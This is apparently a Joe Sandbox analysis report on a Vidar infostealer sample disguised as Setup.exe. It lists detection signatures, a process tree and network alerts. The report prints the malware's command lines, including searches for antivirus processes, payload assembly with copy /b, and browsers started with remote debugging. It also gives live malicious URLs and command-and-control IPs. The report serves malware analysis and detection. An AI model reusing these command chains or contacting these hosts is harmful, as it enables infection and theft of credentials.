Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:	Setup.exe
Analysis ID:	1569580
MD5:	6de99ee6752927e6a33373893d2cfc05
SHA1:	244dab1f7d21b8e340a1af09bd202427e7319076
SHA256:	080a5667b9dc8aa2362528f5e1dd5ddfcd5064301f995f52095c90def8748915
Tags:	exeuser-smica83
Infos:

Detection

Vidar

Score:	81
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

Binary is likely a compiled AutoIt script file

Drops PE files with a suspicious file extension

Drops executables to the windows directory (C:\Windows) and starts them

Monitors registry run keys for changes

Sigma detected: Execution from Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Tries to harvest and steal browser information (history, passwords, etc)

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Suspicious Copy From or To System Directory

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

Setup.exe (PID: 6552 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 6DE99EE6752927E6A33373893D2CFC05)

msiexec.exe (PID: 5472 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Lemcorporation\Setup 0.5.1.2\install\Setup.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Setup.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733431593 " MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6512 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 3224 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 82260A52980C2844E9E250AB0420C526 C MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 4028 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 940B1FE1CFD6E428C01CBEAC4D3DBCDC C MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 7056 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F4149E57099CE1AEFABD5D1B5FEFF577 MD5: 9D09DC1EDA745A5F87553048E57620CF)

MSIA1F4.tmp (PID: 6204 cmdline: "C:\Windows\Installer\MSIA1F4.tmp" /DontWait "C:\Users\Public\Desktop\Setup.exe" MD5: DAEFCC204211C3D179EACC0C6EE4BCC6)

Setup.exe (PID: 5540 cmdline: "C:\Users\Public\Desktop\Setup.exe" MD5: 7CD7B906FB5F3E5273F26DE707A33037)

lem.exe (PID: 5660 cmdline: C:\Users\user\AppData\Local\Temp\lem.exe MD5: 82CCD973E00420A4768BC76D2F442F52)

cmd.exe (PID: 6608 cmdline: "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2508 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6252 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 5472 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6552 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6592 cmdline: cmd /c md 402438 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 6172 cmdline: findstr /V "integratedintlhandlingwaterproofcbperformtreasurertim" Recording MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6416 cmdline: cmd /c copy /b ..\Coaches + ..\Hypothetical + ..\Nasty + ..\Fly + ..\Zum + ..\Disclose + ..\Expensive + ..\Argue N MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Suicide.com (PID: 4708 cmdline: Suicide.com N MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)

chrome.exe (PID: 4824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2296,i,7454184936104441568,15568927826006656049,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 5360 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

choice.exe (PID: 1292 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Desktop\Setup.exe" , CommandLine: "C:\Users\Public\Desktop\Setup.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Desktop\Setup.exe, NewProcessName: C:\Users\Public\Desktop\Setup.exe, OriginalFileName: C:\Users\Public\Desktop\Setup.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Public\Desktop\Setup.exe" , ProcessId: 5540, ProcessName: Setup.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 45.130.41.93, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Desktop\Setup.exe, Initiated: true, ProcessId: 5540, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49710

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Suicide.com N, ParentImage: C:\Users\user\AppData\Local\Temp\402438\Suicide.com, ParentProcessId: 4708, ParentProcessName: Suicide.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 4824, ProcessName: chrome.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\lem.exe, ParentImage: C:\Users\user\AppData\Local\Temp\lem.exe, ParentProcessId: 5660, ParentProcessName: lem.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd, ProcessId: 6608, ProcessName: cmd.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6608, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6552, ProcessName: findstr.exe

Suricata Signatures

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T21:50:12.116816+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	49710	45.130.41.93	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T21:51:43.653462+0100	2044247	1	Malware Command and Control Activity Detected	5.75.212.196	443	192.168.2.5	49903	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T21:51:45.936317+0100	2051831	1	Malware Command and Control Activity Detected	5.75.212.196	443	192.168.2.5	49909	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T21:51:45.936132+0100	2049087	1	A Network Trojan was detected	192.168.2.5	49909	5.75.212.196	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T21:50:12.116816+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49710	45.130.41.93	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://cyberyoda.icu/lem.exe7	Avira URL Cloud: Label: malware
Source: https://ikores.sbs/	Avira URL Cloud: Label: malware

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.212.196:443 -> 192.168.2.5:49883 version: TLS 1.2

Source: Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: wininet.pdb source: Setup.exe, 00000000.00000003.2031159892.00000000083C0000.00000004.00000020.00020000.00000000.sdmp, shi732E.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: MSIA1F4.tmp, 00000007.00000002.2152768418.00000000005CF000.00000002.00000001.01000000.00000008.sdmp, MSIA1F4.tmp, 00000007.00000000.2151166804.00000000005CF000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, Setup.msi.0.dr, MSIA0BB.tmp.2.dr, 559dea.msi.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Setup.exe, Setup.msi.0.dr, MSIA03D.tmp.2.dr, 559dea.msi.2.dr
Source:	Binary string: wininet.pdbUGP source: Setup.exe, 00000000.00000003.2031159892.00000000083C0000.00000004.00000020.00020000.00000000.sdmp, shi732E.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Setup.exe, Setup.msi.0.dr, 559dea.msi.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Setup.exe, MSI744A.tmp.0.dr, MSI9FAE.tmp.2.dr, MSI7B91.tmp.4.dr, MSI73BC.tmp.0.dr, Setup.msi.0.dr, MSI7489.tmp.0.dr, MSI7B61.tmp.4.dr, MSI9FFD.tmp.2.dr, 559dea.msi.2.dr, MSI7A65.tmp.4.dr, MSI7A95.tmp.4.dr, MSI7580.tmp.4.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Setup.exe
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSIA1F4.tmp, 00000007.00000002.2152768418.00000000005CF000.00000002.00000001.01000000.00000008.sdmp, MSIA1F4.tmp, 00000007.00000000.2151166804.00000000005CF000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, Setup.msi.0.dr, MSIA0BB.tmp.2.dr, 559dea.msi.2.dr

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0086E090 FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	0_2_0086E090
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00844D70 FindFirstFileW,GetLastError,FindClose,	0_2_00844D70
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0086D390 FindFirstFileW,FindClose,DeleteFileW,GetLastError,	0_2_0086D390
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0086A320 FindFirstFileW,FindClose,	0_2_0086A320
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0088E410 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	0_2_0088E410
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00844440 FindFirstFileW,FindFirstFileW,FindClose,FindClose,	0_2_00844440
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_008269A0 FindFirstFileW,FindNextFileW,FindClose,	0_2_008269A0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0087AA50 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	0_2_0087AA50
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00852D10 FindFirstFileW,FindClose,FindClose,	0_2_00852D10
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00704DD0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,	0_2_00704DD0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0087AED0 FindFirstFileW,FindClose,	0_2_0087AED0
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005C1860 FindFirstFileExW,	7_2_005C1860
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC5C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_00007FF79EC5C7C0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC5BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00007FF79EC5BC70
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC5B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00007FF79EC5B7C0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC671F4 FindFirstFileW,FindClose,	8_2_00007FF79EC671F4
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC672A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_00007FF79EC672A8
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC22F50 FindFirstFileExW,	8_2_00007FF79EC22F50
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC6A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_00007FF79EC6A874
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC6A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,	8_2_00007FF79EC6A350
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC6A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,	8_2_00007FF79EC6A4F8
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC66428 FindFirstFileW,FindNextFileW,FindClose,	8_2_00007FF79EC66428
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Code function: 10_2_00406301 FindFirstFileW,FindClose,	10_2_00406301
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Code function: 10_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	10_2_00406CC7

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_007244D0 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,

0_2_007244D0

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\402438\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\402438	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 17MB later: 39MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49909 -> 5.75.212.196:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.212.196:443 -> 192.168.2.5:49903
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.212.196:443 -> 192.168.2.5:49909

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx-reuseport/1.21.1Date: Thu, 05 Dec 2024 20:50:11 GMTContent-Type: application/octet-streamContent-Length: 1192690Last-Modified: Thu, 05 Dec 2024 16:19:35 GMTConnection: keep-aliveKeep-Alive: timeout=30ETag: "6751d297-1232f2"Expires: Sat, 04 Jan 2025 20:50:11 GMTCache-Control: max-age=2592000Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 8a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 30 10 00 00 04 00 00 a0 08 12 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 fe 19 00 00 00 00 00 00 00 00 00 00 52 e0 11 00 a0 52 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 fe 19 00 00 00 00 10 00 00 1a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 20 10 00 00 10 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ

Source: global traffic

HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View	ASN Name: BEGET-ASRU BEGET-ASRU
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 45.130.41.93:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49710 -> 45.130.41.93:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC6E87C InternetReadFile,

8_2_00007FF79EC6E87C

Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: ikores.sbsConnection: Keep-AliveCache-Control: no-cache
